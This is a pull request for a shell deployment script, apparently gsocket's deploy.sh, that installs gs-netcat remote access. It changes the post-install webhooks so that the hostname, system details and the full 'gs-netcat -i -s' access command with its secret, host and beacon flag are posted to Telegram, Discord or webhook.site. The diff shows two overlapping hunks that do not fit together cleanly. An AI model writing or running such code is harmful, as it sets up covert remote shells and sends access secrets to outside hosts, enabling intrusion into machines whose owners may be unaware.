### PR TITLE
fix: extra args and options when using webhook

### DIFF
--- a/deploy/deploy.sh
+++ b/deploy/deploy.sh
@@ -162,7 +162,6 @@ unset URL_BASE_CDN URL_BASE_X
 # shellcheck disable=SC2016 #Expressions don't expand in single quotes, use double quotes for that.
 GS_EXTRA_ARGS=()
 [[ -n $GS_HOST ]] && GS_EXTRA_ARGS+=(" GS_HOST=$GS_HOST")
-[[ -n $GS_PORT ]] && GS_EXTRA_ARGS+=(" GS_PORT=$GS_PORT")
 
 GS_EXTRA_OPTIONS=()
 [[ -n $GS_BEACON ]] && GS_EXTRA_OPTIONS+=("-w")

--- a/deploy/deploy.sh
+++ b/deploy/deploy.sh
@@ -160,7 +160,14 @@ unset URL_BASE_CDN URL_BASE_X
 
 # WEBHOOKS are executed after a successful install
 # shellcheck disable=SC2016 #Expressions don't expand in single quotes, use double quotes for that.
-msg='$(hostname) --- $(uname -rom) --- gs-netcat -i -s ${GS_SECRET}'
+GS_EXTRA_ARGS=()
+[[ -n $GS_HOST ]] && GS_EXTRA_ARGS+=(" GS_HOST=$GS_HOST")
+[[ -n $GS_PORT ]] && GS_EXTRA_ARGS+=(" GS_PORT=$GS_PORT")
+
+GS_EXTRA_OPTIONS=()
+[[ -n $GS_BEACON ]] && GS_EXTRA_OPTIONS+=("-w")
+
+msg='$(hostname) --- $(uname -rom)${GS_EXTRA_ARGS:+ ---${GS_EXTRA_ARGS[*]}} gs-netcat -i -s ${GS_SECRET} ${GS_EXTRA_OPTIONS}'
 ### Telegram
 # GS_TG_TOKEN="5794110125:AAFDNb..."
 # GS_TG_CHATID="-8834838..."
@@ -177,7 +184,7 @@ msg='$(hostname) --- $(uname -rom) --- gs-netcat -i -s ${GS_SECRET}'
 # GS_WEBHOOK_KEY="dc3c1af9-ea3d-4401-9158-eb6dda735276"
 [[ -n $GS_WEBHOOK_KEY ]] && {
 	# shellcheck disable=SC2016 #Expressions don't expand in single quotes, use double quotes for that.
-	data='{"hostname": "$(hostname)", "system": "$(uname -rom)", "access": "gs-netcat -i -s ${GS_SECRET}"}'
+	data='{"hostname": "$(hostname)", "system": "$(uname -rom)", "access": "${GS_EXTRA_ARGS:+${GS_EXTRA_ARGS[*]}} gs-netcat -i -s ${GS_SECRET} ${GS_EXTRA_OPTIONS}"}'
 	GS_WEBHOOK_CURL=('-H' 'Content-type: application/json' '-d' "${data}" "https://webhook.site/${GS_WEBHOOK_KEY}")
 	GS_WEBHOOK_WGET=('--header=Content-Type: application/json' "--post-data=${data}" "https://webhook.site/${GS_WEBHOOK_KEY}")
 }


### PR DESCRIPTION
Currently when using webhooks (Telegram, webhook.site and Discord webhook) the values of `GS_HOST` is not reported and `-w` is omitted if `GS_BEACON` is set.

These changes make it so that if these variables are set they will be appear in the message.

## Current version:
```console
GS_TG_TOKEN=$MY_TG_TOKEN GS_TG_CHATID=$MY_TG_CHATID GS_HOST=1.2.3.4 GS_PORT=53 GS_BEACON=2 bash deploy/deploy.sh
--> Trying x86_64-linux
Downloading binaries........................................................[OK]
[...]
Executing webhooks..........................................................[OK]
[...]
~/Downloads/cloned/gsocket %
```
Message received on Telegram:
```
computer --- 6.6.87.1-microsoft-standard-WSL2 x86_64 GNU/Linux --- gs-netcat -i -s <secret>
```

## With these changes:
```console
GS_TG_TOKEN=$MY_TG_TOKEN GS_TG_CHATID=$MY_TG_CHATID GS_HOST=1.2.3.4 GS_PORT=53 GS_BEACON=2 bash deploy/deploy.sh
--> Trying x86_64-linux
Downloading binaries........................................................[OK]
[...]
Executing webhooks..........................................................[OK]
[...]
~/Downloads/cloned/gsocket %
```
Message received on Telegram:
```
computer --- 6.6.87.1-microsoft-standard-WSL2 x86_64 GNU/Linux --- GS_HOST=1.2.3.4 gs-netcat -i -s <secret> -w
```